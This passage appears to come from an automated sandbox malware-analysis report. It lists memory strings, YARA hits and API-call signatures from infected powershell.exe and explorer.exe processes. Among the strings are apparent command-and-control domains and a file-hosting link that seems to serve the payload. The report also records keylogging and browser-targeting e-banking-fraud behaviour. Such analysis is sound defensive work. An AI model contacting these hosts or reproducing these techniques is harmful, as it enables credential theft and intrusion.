                Source: explorer.exe, 00000011.00000002.2435370827.00000000031D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpR
                Source: explorer.exe, 00000011.00000002.2435370827.000000000321C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ndex.phps
                Source: explorer.exe, 0000000E.00000002.3025073202.000000000C4A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga:80/index.php
                Source: explorer.exe, 0000000E.00000002.3016670516.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150001828.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2152605558.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 00000001.00000002.1934299085.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1824151467.0000000005541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2660757164.0000000005351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000004A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: explorer.exe, 0000000E.00000002.3027555495.000000000CADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://siwffuchsxpuu.net/
                Source: explorer.exe, 0000000E.00000002.3027555495.000000000CADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://siwffuchsxpuu.net/application/x-www-form-urlencodedMozilla/5.0
                Source: powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: explorer.exe, 0000000E.00000002.3014261792.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.00000000079B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: powershell.exe, 00000003.00000002.1828441360.0000000007B90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2652155063.0000000003525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                Source: powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com
                Source: powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
                Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: explorer.exe, 0000000E.00000002.3025073202.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2158219797.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                Source: explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                Source: explorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                Source: powershell.exe, 00000003.00000002.1824151467.0000000005541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6PO
                Source: powershell.exe, 00000001.00000002.1934299085.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2660757164.0000000005389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2660757164.0000000005398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000004A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                Source: explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                Source: explorer.exe, 0000000E.00000000.2144420450.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3010837612.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3007948093.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2145335102.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 0000000E.00000000.2150818105.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                Source: explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 0000000E.00000000.2150818105.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                Source: explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                Source: explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                Source: explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: powershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000001.00000002.1934299085.0000000004967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                Source: explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                Source: powershell.exe, 00000001.00000002.1950833514.0000000005878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1826452749.00000000065A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                Source: explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 0000000E.00000002.3025073202.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2158219797.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                Source: explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                Source: explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                Source: explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.4:49731 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5432, type: MEMORYSTR
                Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_02D5162B GetKeyboardState,ToUnicode,27_2_02D5162B

                E-Banking Fraud

                barindex
                Source: C:\Windows\SysWOW64\explorer.exeCode function: StrStrIA, chrome.exe|opera.exe|msedge.exe20_2_03042EA8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe20_2_03043862
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe20_2_03043862
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe20_2_03043862
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe20_2_03043862

                System Summary

                barindex
